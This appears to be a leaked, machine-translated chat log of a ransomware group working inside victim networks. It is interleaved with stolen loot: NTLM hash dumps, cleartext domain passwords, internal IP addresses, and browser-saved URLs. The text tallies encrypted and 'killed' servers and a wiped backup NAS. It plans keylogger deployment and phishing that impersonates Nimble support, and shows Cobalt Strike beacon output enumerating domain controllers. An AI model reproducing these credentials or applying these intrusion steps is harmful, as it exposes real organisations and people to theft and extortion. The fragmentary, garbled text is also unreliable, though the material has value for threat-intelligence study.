39700 ITCMA-PRINT-SVR$ cfcd4fe5685597b9476ec1f2b92a2667 4096
8157 WarehouseLeader 8aa0f378d8599eb42b0156c7b8f981e0 512
5639 ITCMA-LT1049$ 0b5e0acef3de4fef2d12b21bf83ecfc9 4096
5629 ITCMA-WS1081$ d0451c2ba33b521925ea2837957019a6 4096
1149 andrewm 41b055063b922eb200e05e0665216900 512
39631 ITCMA-LT1074$ 0b1683f6e9a8caa5128f8d1d0f77c49e 4096
9204 ASITC-WS0086$ 04a2fbac7c05f2d0b3222b36f5c773c9 4096
5630 ITCMA-LT1044$ 30149233998aa92322877831261ecff6 4096
9176 ASITC-WS0073$ 9b76cb2971784e4c5aa6e69d65cf3dd6 4096
5640 ITCMA-WS1089$ 29b5e841b13e010e4259fa8f8a75ac71 4096
1244 Philipb c6e7e05b483681c06169eda2c48689a9 512
2197 Elkreceiving 88f15581c12034e22387d5525101a892 512
5663 ITCMA-LT1052$ 4b27ff15193a56cf72d1784da5c7be35 4096
40143 ITCMA-LT1078$ 8cfdcc1544a281d08061ca6731549319 4096
5331 ITCMA-WS1086$ a66e29ae4c6eff3d2c1bd4502b9470b7 4096
5316 ITCMA-WS1088$ 6eb66e69da9559da92f3a046b451db30 4096
39652 ITCMA-LT1079$ 0f106efcb1fc0d3dc123eda3b03d6a44 4096
8176 chrish 4c605d1a2ec161770816400927e35c1d 512
1135 greggh 6bd042586c6b3caef7e03d25f260b84f 512
39645 ITCMA-LT1076$ 7d3296432028512ab4902608888a5030 4128
9107 ITC-PLM02$ 84747a0bd7330d7388f82ebf5a4f6242 4096
40194 ITCMA-LT1086$ a742bcefedbcabee3487056dbc8ee4a4 4096
1222 davem c5af95985a288dc02cbfe9f08d56c57a 512
5653 JasonH e8ef93628fd7148f2833e7b48a1610d4 512
40201 ITCMA-WS1100A$ e4793f7b063d95a910f84d864c3855f2 4096
5344 itcma-lt1051$ 3131c041b16fd74e822bdbd7ce33e74c 4096
1128 billm d1b753453d1babe132217d7e3d738e36 512
39663 freshservice f50ea5bf66b0901306e8db471c80f6 512
5668 ITCMA-LT1061$ 525a9ad3108afe8c93e4041550915221 4096
2204 cassiel d37001504f330930930271fa40863ad0977 512
5172 ITCMA-WS1059$ 44a1d1bc8cadd009439c398c5f99c4be 4096
40203 karolynk c62f11452548e5860f8df083a488d378 512
40196 ITCMA-LT1087$ 2b358ce837969534ae4c11be8f668783 4128
9167 ASITC-WS0023$ 5fe2cd8c82a551c163a2f32bd361c3dd 4096
8118 EllenL 1ee6b8270b6eee2a9a06b7b49efaee4b 512
9148 ASITC-WS0059$ 6de2a3f710075ab0c368fcdd754ab957 4096
2168 PeterP b7e98d67d450a6e8cc7c6cc2c7259b 512
2170 bellaf 589b85762d8ab451401df29aa7fdc417 512
8150 ShannonR 4478251daf3dd7961b805f5fd1306fce 512
5334 ITCMA-WS1092$ b5f1809435b128ced7a8c956b86c7976 4096
41112 lunah 589b85762d8ab451401df29aa7fdc417 512
9166 ASITC-WS0024$ a2f51875d8c47f9d40a8a0cd440069a8 4096
5209 SQL_Services 0a439b9c925710be50b7cb1f2e66a37e 66048
1289 stevel 2d065f436e8300d30e05e552e266c5ef 512
9191 ASITC-WS0054$ 5fc55ecf64adce9ff593de9b7951d1f4 4096
5240 ITCMA-FILE02$ 12b0ed1384146ccffd020f39378aad6a 532480
9220 ASITC-WS0118$ dcc6caa17f7df07b458a75c2435c12ff 4096
39701 ITCMA-RDS-SVR01$ 7d527a538c39f4f4d47342fe34af527f 4096
5287 AlanS 08475e239783c166d5c35f940a15ffa5 512
1137 suellenc 7c98ab757299b4e6b102e8b6db6db33b 512
5326 DennisZ 41be95cb06542e4dde52784e49735921 512
41609 ASITC-WS0201$ cf1f80af2f1a8279fda86ad90074a235 4096
40192 ITC-DC-SVR01$ 8058ee87cd2e147c2b1b8fa17512ec3d 532480
5147 smitht ac73e3569312c470c1173050f9763713 512
5634 ITCMA-WS1082$ afb0631ce1aa2504b7bada2e9bcad27d 4096
1133 keng e8568c9ae1e15dacf8336cd6fb5d428e 512
5620 ITCMA-WS1075$ 99e4f2fe05a381d12e3248d1938c75d6 4096
5333 PhilipJ cef2eb521883d390b32b0b5bb916f7bb 512
5299 SevM de7bab8e4b98b6c8b6287085f73c8592 512
5282 ITCMA-LT1038$ 3b54a3c420e79658948fc617847cf88d 4096
5309 JudyB ff85c532cb37f917934ae5de662ef493 512
8120 ITCMA-LT1053$ ce92e3e3e6689888cb084c45f67a882a54 4096
1125 chars 8d0491b148a4a8e097a51f426b437d42 512
8184 brandent fced468d4c2103847b007cb4765c6e55 512
8182 ITCMA-WS$ 7e407f2c3e54dc2744b30185b7ad9c46 4096
500 Administrator 0cc0cdacd8aa7f3b06e7cdfffa909b11 66048
5281 SandyM 1d73e704a42de6cfd317b0f88a4e658c 512
1719 jamesn d6c67163e32e3dac2b782c87ade65ad9 512
41118 ITCMA-LT1091$ a41dba55bb5c31b134ec2739a79e5e1d 4096
40171 alyssaw c510df06d92c28c967cf18634b068468 512
40127 ITCMA-MITS01$ d78c60dab4360d4056284e568ee8823e 4096
where did you get without a domain did not take the risk yet where the administrator did not show pinged all machines yesterday and let the brute force with the domain on the ms17 did not work this LA - domain user there is a system, no current craps besides the current LA do not roll?
remote.itc-us.com
```
can itc-us.com be accessed in the file? this particular pcc 139 445 3389? is it ok now? user7user8good, already interesting itc-us.com microadmins, i checked itc-us.com
CORP\agam_wipro T3l3visa.2020#
CORP\praveen_wipro Vandana@1910
CORP\ctxdbadmin T3l3v1$a$f32018.+
CORP\ntxvmmadmin T3l3v1$a$f32018.+
CORP\poonam_wipro T3l3visa.2020#
``Some movement has occurred. No movement so far.``
i checked the jjgarcian, aruizmon sessions and found no craps, those that were kerd did not fit
i checked everything and everyone on la and i checked for passwords
nothing (glaselbl[ ](https://mediaeveryone.com/group/0-dead-waterway-com?msg=Pw7n6Ew6WELxcbuso) > vve8 beacon> sleep 100
??0.dead.waterway.comkobu meemi nicht mehr als die kobu wirkschlossen in slipknot 1000[ ](https://mediaeveryone.com/group/waterway-com?msg=N7wWs4gzjXxN7BAT8) +goodnight
until tomorrow = )Adios, everyone, see you tomorrowhttp://vk.com/@thntofff-ataki-na-active-directory-razbiraem-aktualnye-metody-robshihs all gonehiiGood morningMay someone open the door? All have a good night) loomisco.com half an hour + - is there time to go away now, or there is time to go away? ok for the guide that was thrown to him? without fixing to collect in terms of fixing? will be new nets, give access to the cobu. need to work out) hmm?need your help, then to him to agree to fucking @user4 without 2f, I mb to connect to him? only more qr code can be confirmed) the same thing uffpoka replacement need to go through the sessions, then 1 more to go through? on the second hit immediately in 2fa did not come up + your ``
CORP:
    srvs:
        on hell: 617
        alive: 513
        killed:415 (8 stopped pinging\90 masked and killed the process)
    arms:
        in hell: 5383
        alive: 1,177
 
EQUIP:
    srvs:
        by hell: 7
        alive: 7
        shut down: 7
    arms:
        by hell: 510
        alive: 175
 
FILIAL:
    srvs:
        by hell: 51
        alive: 43
        shut down: 43
    arms:
        by hell: 1,057
        alive: 359
 
TELEVISA:
    srvs:
        by hell: 6
        alive: 6
        shut down: 6
    arms:
        by hell: 5
        alive: 0
 
TSM:
    srvs:
        by hell: 64
        alive: 61
        shut down: 56 (5 were masked)
    arms:
        by hell: 1,287
        alive: 488

all live armas were distributed and the build is running and disks were shared
vim's server is encrypted
found one NAS with old backups - it's been wiped
````equiposoi.com.mx`DA`
```
televisa.com.mx\EndPoint 1b88d8b5594f3c678e385e1542343a67
 
corp\IWAM_GSCCORP 1eb54402478918c76dfb96ddc8d433a7
 
equip\IWAM_GSCEQUIPOSOI 7ea993872e793d33af66dbe9e5d70b6d
 
filial\IWAM_GSCFILIAL 232635a056930205a1c94250de111114
 
tsm\ES050616T b3d68fa099d16c02fe6e79646133730f
````CORP\IWAM_GSCCORP $iHlpk#~sCOG6sJ!y]k7+{IHm````
Shares for 10.7.39.52:
	[--- Listable Shares ---]
		Copia de CORPSFEVSWEB02
``````
krsantiagoc-SNG16843-CHROME
        https://home.mcafee.com/Secure/ResetPassword.aspx
jdcardenasm-CHA13887-CHROME
        https://home.mcafee.com/Secure/ResetPassword.aspx
        https://home.mcafee.com/secure/protected/login.aspx
amorela-SFE17310-CHROME
        https://dellem.mcafeemobilesecurity.com/resetPin.aspx

``````
10.7.215.48
10.7.1.252
10.7.15.239
````10.7.215.61``10.7.15.210`
```
10.7.15.137
10.7.15.240
10.7.215.32
10.7.215.32
10.7.216.36
````10.7.15.243``10.7.39.67``10.7.15.118``10.7.39.50`[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=x7DkKtrixs4fs8n46) admin
Angel123*`10.7.216.49````
administracionbur-CORPKIOVEEAM02-CHROME
        http://10.7.6.122/Login.aspx

``I wrote that no@tl1 New grids will be today? not everywhere there is a note keylogging? to the fact that they are not itching at all ... well, I see) waiting for login + alertno not alertaet more min 30 minutes how long will wait for the alerts? at threetut, I checked e-mail as if one @user8 does everything look for files there@all where everything? what do we have on the mouth? so they certainly changed passes) aha
at first the exh was not available, but the problem was in the proc))
i checked 4 admins - no passwords? no, i can't get info on rtp in the mail? ready at 17:30 thank you + keylog is ready, anyone have blauer? all have keylog working? i have 1,3 except blauer know exactly what i have, do we all have sessions?
 displayName: Dianne Jarden
>displayName: Brandon Lauer
>displayName: Greg Keller
>displayName: Mark Harper
>displayName: Mike Pusatera
Or at 5:00 in the morning? What are they writing there 2 people at #1-done-rtpcompany-com read the post at 4:30 ready at 5 work with water at 5 that's it, it didn't want to go in, it only went in at 10.
The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action

In situation where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time".
The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed, if so desired.
If the Array Group was updated to NimbleOS 5.1.x for over 90 days and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation to avoid repeat notification.
If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: login to the HPE InfoSight Web Portal at http://infosight.hpe.com/ Under the Wellness tab,
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
* Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
* Uncheck the "Create Issue?" checkbox next to a specific serial number.

NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually.

If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution.

Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html

For your convenience, the following is the U.S. support contact information:
Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2
Local: 408-432-9600, extension 2
Email: support@nimblestorage.com

For other international support phone numbers, scroll down to HPE Nimble Support section and expand the "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html

***********************************************************************************
CASE REFERENCE NUMBER REQUIRED - DO NOT MODIFY ref:_00D80aba6._5002H1HQkfz:ref
***********************************************************************************
NOTE: This is an automated alert sent from Salesforce.com. This email message is for the sole use of the intended recipient(s) and contains confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. Alert ID: https://nimblestorage.my.salesforce.com/00X80000001v7Fw

CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``Thank you''.
* Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A

b) Choose appropriate value for the expiration of the unmanaged snapshots and check which snapshots already expired, which ones will expire and when.

NOTE: Negative value shows when snapshots would have already expired, positive value show in what amount of time the snapshots will expire based on value and units checked.

* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours

c) Select snapshots which you prefer to keep for longer than the rest of unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.

* Nimble OS $ snap --edit <snapshot_name> --vol <volume_name> --ttl <numeric_value> --ttl_unit <unit>

Example:
* Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days

d) Change TTL to enabled state and choose appropriate units and value of units.

NOTE: It is recommended to select expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.

* Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
* INFO: Snapshot Time-to-live is set to 30 days.

e) Verify the list of unmanaged snapshots has had expiry time updated as desired:

* Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +8.57 weeks
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +4.29 weeks
``````
A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.

Account Name: Waterway Gas & Wash Company Array SN: AF-180176 Array Name: ww-nimble-01 Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General

Case Subject: Unmanaged snapshot(s) have been detected due to configuration change Case Description: PLEASE NOTE: This is an automatically closed case, if condition is expected, no reply is required.
Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article:

https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4

HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array.
The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection.
In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner.
Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature will be enabled or until they have been removed/deleted manually.
As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space.

There are a few considerations regarding the deletion of unmanaged snapshots; please ensure to review the KB article attached to this case for more details.

To avoid these cases in the future, you may enable Time-To-Live feature (TTL), which is available as of NimbleOS 5.1.x.
The feature will expire the snapshots which are considered unmanaged automatically based on the set period of time.
TTL is enabled manually by the user via CLI only. Following, are the recommended steps to enable the feature:

a) List current snapshots which are unmanaged, note that current expiry is set to "N/A" such as in the example:

``Davaiem... let's better copypaste fullscreen messages from nimblahhhhhhahh helpdesk so they collect some from neighboring pc or predict user input))))120 percent is it so they generate 20 percent garbage in the output?)))we only have 1 chance to make keyloggers work at 120 percent where will flash ctrl look where will copy from if there?
```
[ctrl][v]
[ctrl][v]
``ok, now I get the idea that it's realistic once could bemight think that boganulot to alert about logging in all you have to log in 1 in 1 you catch the pass in the keyloggerwill make them log in no, they will do it differently, write on behalf of nimbla) well I mean, that will pass social engineering if they start spamming each other about nimbla?they send it a week ago they wrote it is fresh it is fresh but it is no different from the old ones that they sent earlier and repeat they send it to each other but the date is fresh?now i will send a screenshot of the letter to my modest count of 3 and many times they forwarded the last letter between them (also a long time ago) nothing more? a million is how much is our? there was only correspondence with the supplier, but it was a million years ago blah blah blah it is for 192.168.0.75 read more carefully i have seenwhen they communicate so did not meet some nimble trust some nimble contactsgkeller there someone explained to someone for nimble as i remember nimble helpdesk tell me who they correspond with regarding nimble files and backups in ortpa no, there are several sessions in slip + build and other things prepare for this time soxda hang a hundred years in 4 start vodokaylogger scattered?no already, no rts check live sessions quicklyg hello, user 3 is delayed where do we have @user3 ? hello:space_invader:hii all in place? hello brothanks bro+user3@tl1 please add @user3 here ntlm hash-stop, and those hashes that rubus pulls can he do tokens with them or not ?@user7 have you skimmed hashes from trusts yet? will we put all hashes on cmd5 and clears into the farm?
i need to feed it with passlists only i will suffer because of this situation with kerbamy i would say if it was brutalized(([ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=bLCSsCf6C9csGXoXh) @tl2 @tl1 did any of it brutalized? look at all they repeat so there is corp.televisa.com.mx and televisa.com.mxS-1-5-21-1935655697-329068152-1801674531
The SIDs of the odin are not
everyone is correct more accurately different....
crap
the structure is weird again, they are different e.g.
dn:CN=tsm.televisa.com.mx,CN=System,DC=corp,DC=televisa,DC=com,DC=mx
dn:CN=tsm.televisa.com.mx,CN=System,DC=televisa,DC=com,DC=mx
``Why are....+ repeated exactly the same way?
Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:33:32> shell nltest /dclist:televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:televisa.com.mx
[+] host called home, sent: 61 bytes
[+] received output:
Get list of DCs in domain 'televisa.com.mx' from '\\TVSASFEDC01.televisa.com.mx'.
    TVSAKIODC01.televisa.com.mx [PDC] [DS] Site: SFE
    TVSASFEDC01.televisa.com.mx [DS] Site: SFE
     TVSAAZDC01.televisa.com.mx [DS] Site: AZURE
     TVSAAZDC02.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:35:46> shell nltest /dclist:corp.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:corp.televisa.com.mx
[+] host called home, sent: 66 bytes
[+] received output:
Get list of DCs in domain 'corp.televisa.com.mx' from '\\CORPKIODC02.corp.televisa.com.mx'.
      CORPSFEDC02.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC03.corp.televisa.com.mx [PDC] [DS] Site: SFE
      CORPSNGDC02.corp.televisa.com.mx [DS] Site: SNG
      CORPSFEDC04.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC02.corp.televisa.com.mx [DS] Site: SFE
    CORPKLHLQDC01.corp.televisa.com.mx [DS] Site: QRO
    CORPKLHLSDC01.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC04.corp.televisa.com.mx [DS] Site: SFE
       CORPAZDC01.corp.televisa.com.mx [DS] Site: AZURE
       CORPAZDC02.corp.televisa.com.mx [DS] Site: AZURE
      CORPCHADC02.corp.televisa.com.mx [DS] Site: SFE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:36:08> shell nltest /dclist:equiposoi.net
[*] Tasked beacon to run: nltest /dclist:equiposoi.net
[+] host called home, sent: 59 bytes
[+] received output:
Get list of DCs in domain 'equiposoi.net' from '\\SOISFEDC01.equiposoi.net'.
    SOISFEDC01.equiposoi.net [PDC] [DS] Site: Equiposoi
    SOISFEDC02.equiposoi.net [DS] Site: Equiposoi
     AZPRDC010.equiposoi.net [DS] Site: Equiposoi
     AZPRDC009.equiposoi.net [DS] Site: Equiposoi
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:37:31> shell nltest /dclist:filial.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:filial.televisa.com.mx
[+] host called home, sent: 68 bytes
[+] received output:
Get list of DCs in domain 'filial.televisa.com.mx' from '\FILIALSFEDC05.filial.televisa.com.mx'.
    FILIALIALSFEDC05.filial.televisa.com.mx [PDC] [DS] Site: SFE
    FILIALIALSFEDC02.filial.televisa.com.mx [DS] Site: SFE
     FILIALIALAZDC01.filial.televisa.com.mx [DS] Site: AZURE
     FILIALIALAZDC02.filial.televisa.com.mx [DS] Site: AZURE
    FILIALIALSFEDC01.filial.televisa.com.mx [DS] Site: SFE
     Filialazdc03.filial.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:38:08> shell nltest /dclist:tsm.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:tsm.televisa.com.mx
[+] host called home, sent: 65 bytes
[+] received output:
Get list of DCs in domain 'tsm.televisa.com.mx' from '\\TSMSFEDC01.tsm.televisa.com.mx'.
    TSMSFEDC05.tsm.televisa.com.mx [PDC] [DS] Site: SFE
     TSMAZDC01.tsm.televisa.com.mx [DS] Site: AZURE
     TSMAZDC02.tsm.televisa.com.mx [DS] Site: AZURE
    TSMSFEDC01.tsm.televisa.com.mx [DS] Site: SFE
     TSMAZDC03.tsm.televisa.com.mx [DS] Site: AZURE
The command completed successfully

```
the fuckup came out, the trusts 5, in adinfo they repeat theydabild was new?)and if I start the dll there will essentially come only after what time in the bilder was specified `Task SvcRestartTask#27778 22/01/2021 01:38:45 p. Ready `no+systems right yet ? `CORPSFECRT04 `hooked up a session on adinfo 14a how many are there ? or not ?and just in case in some of the trusts fix kinunorm, as soon as the vpn turn on I immediately fix the server (there's the last login was in June 20) and I can only zakrepa youokda fix that on the polzachet, and he hz when your vpn turn onrebildniy shelkodest sessiona you have not fix? found a server where you can fix[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=hfBbb7W5fFJPrsZno) .is there a session alive ? if so can spam it on me, silkod aboveponyalbakapki machines in the lock or in the trashbakapki informationa why do we need them? virtualkuks\machines is a backup of what?yes, most likely we'll take the small ones)):-) let's better take 7.8k backups20 gb backups should we download?)good day) good night everybody good night60 until tomorrow how much tomorrow by 12:00, good guys, clean up after yourself, slip it in and see you tomorrowDBDB Server?
HandleCount Name Priority ProcessId ThreadCount WorkingSetSize

0 System Idle Process 0 0 4 20480

627 System 8 4 97 319488

50 smss.exe 11 268 3 1105920

506 csrss.exe 13 368 9 4775936

79 csrss.exe 13 432 8 3506176

82 wininit.exe 13 440 2 4005888

110 winlogon.exe 13 468 3 5652480

326 services.exe 9 532 6 12713984

837 lsass.exe 9 540 7 17625088

311 svchost.exe 8 648 6 8196096

160 SEDService.exe 8 680 9 11509760

335 svchost.exe 8 740 7 7692288

427 svchost.exe 8 812 12 18022400

303 LogonUI.exe 13 848 11 36507648

172 dwm.exe 13 860 5 54202368

1487 svchost.exe 8 888 42 93220864

659 svchost.exe 8 932 15 13438976

740 svchost.exe 8 1136 18 24133632

353 svchost.exe 8 1280 17 11767808

331 spoolsv.exe 8 1472 11 9891840

97 svchost.exe 8 1504 8 8261632

92 pg_ctl.exe 8 1532 3 5369856

360 postgres.exe 8 1776 3 68055040

42 conhost.exe 8 1784 2 3186688

305 postgres.exe 8 1868 3 5214208

304 postgres.exe 8 1936 2 31318016

303 postgres.exe 8 1944 2 13168640

304 postgres.exe 8 1952 2 13938688

304 postgres.exe 8 1960 2 7790592

304 postgres.exe 8 1968 2 5484544

412 SSPService.exe 8 1296 83 18669568

262 svchost.exe 8 2516 10 11796480

141 tvnserver.exe 8 2548 13 5283840

116 VGAuthService.exe 8 2656 3 10964992

311 vmtoolsd.exe 13 2696 9 91119616

112 ManagementAgentHost.exe 8 2716 9 10297344

153 svchost.exe 8 2740 17 9199616

110 WinCollectSvc.exe 8 2764 4 11280384

992 tomcat7.exe 8 2900 67 607748096

30 conhost.exe 8 2908 2 3112960

324 WmiPrvSE.exe 8 3124 10 22228992

383 svchost.exe 8 3456 19 9252864

109 svchost.exe 8 3600 4 4788224

195 dllhost.exe 8 3772 11 11304960

162 msdtc.exe 8 3860 10 7917568

308 postgres.exe 8 4344 3 9498624

308 postgres.exe 8 4360 3 9510912

308 postgres.exe 8 4376 3 9502720

523 postgres.exe 8 4392 3 50176000

550 postgres.exe 8 4408 3 57700352

313 RouterNT.exe 8 4936 21 9162752

120 GoogleCrashHandler.exe 4 5096 4 1314816

105 GoogleCrashHandler64.exe 4 5116 4 942080

463 WinCollect.exe 8 3576 45 21114880

30 conhost.exe 8 3900 2 3145728

221 WmiPrvSE.exe 8 3764 8 27688960

205 WmiPrvSE.exe 8 4700 7 15343616

328 ManagementAgentNT.exe 8 1524 20 7852032

147 swc_service.exe 8 1056 6 6971392

634 SavService.exe 8 4568 74 391532544

150 SAVAdminService.exe 8 1288 7 3428352

230 swi_service.exe 8 2580 15 20467712

95 swi_filter.exe 8 1748 4 4517888

138 swi_fc.exe 8 976 7 20144128

141 ALsvc.exe 8 1808 7 2506752
``Write in DB+these virtuals``.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10683:04:24
System 4 Services 0 312 K N/A 0:38:33
smss.exe 268 Services 0 1,080 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 368 Services 0 4,664 K NT AUTHORITY\SYSTEM 0:00:28
csrss.exe 432 Console 1 3,424 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 440 Services 0 3,912 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 468 Console 1 5,520 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 532 Services 0 12,416 K NT AUTHORITY\SYSTEM 0:01:19
lsass.exe 540 Services 0 17,168 K NT AUTHORITY\SYSTEM 0:12:01
svchost.exe 648 Services 0 8,004 K NT AUTHORITY\SYSTEM 0:01:00
SEDService.exe 680 Services 0 11,240 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 740 Services 0 7,516 K NT AUTHORITY\NETWORK SERVICE 0:03:24
svchost.exe 812 Services 0 17,636 K NT AUTHORITY\LOCAL SERVICE 1:28:40
LogonUI.exe 848 Console 1 35,652 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 860 Console 1 52,932 K Window Manager\DWM-1 0:00:00
svchost.exe 888 Services 0 91,004 K NT AUTHORITY\SYSTEM 2:47:42
svchost.exe 932 Services 0 13,124 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 1136 Services 0 23,568 K NT AUTHORITY\NETWORK SERVICE 0:01:59
svchost.exe 1280 Services 0 11,484 K NT AUTHORITY\LOCAL SERVICE 0:00:08
spoolsv.exe 1472 Services 0 9,660 K NT AUTHORITY\SYSTEM 0:00:09
svchost.exe 1504 Services 0 8,056 K NT AUTHORITY\SYSTEM 0:00:00
pg_ctl.exe 1532 Services 0 5,244 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1776 Services 0 66,460 K NT AUTHORITY\NETWORK SERVICE 0:00:00
conhost.exe 1784 Services 0 3,112 K NT AUTHORITY\NETWORK SERVICE 0:00:15
postgres.exe 1868 Services 0 5,092 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1936 Services 0 30,584 K NT AUTHORITY\NETWORK SERVICE 0:00:01
postgres.exe 1944 Services 0 12,860 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1952 Services 0 13,612 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1960 Services 0 7,608 K NT AUTHORITY\NETWORK SERVICE 0:05:19
postgres.exe 1968 Services 0 5,356 K NT AUTHORITY\NETWORK SERVICE 0:00:30
SSPService.exe 1296 Services 0 18,232 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2516 Services 0 11,520 K NT AUTHORITY\SYSTEM 0:00:30
tvnserver.exe 2548 Services 0 5,160 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2656 Services 0 10,708 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2696 Services 0 88,984 K NT AUTHORITY\SYSTEM 1:09:42
managementAgentHost.exe 2716 Services 0 10,056 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2740 Services 0 8,968 K NT AUTHORITY\SYSTEM 0:00:02
WinCollectSvc.exe 2764 Services 0 11,012 K NT AUTHORITY\SYSTEM 1:58:18
tomcat7.exe 2900 Services 0 593,504 K NT AUTHORITY\SYSTEM 1:42:09
conhost.exe 2908 Services 0 3,040 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3124 Services 0 21,804 K NT AUTHORITY\NETWORK SERVICE 1:55:22
svchost.exe 3456 Services 0 9,036 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 3600 Services 0 4,676 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 3772 Services 0 11,040 K NT AUTHORITY\SYSTEM 0:00:00
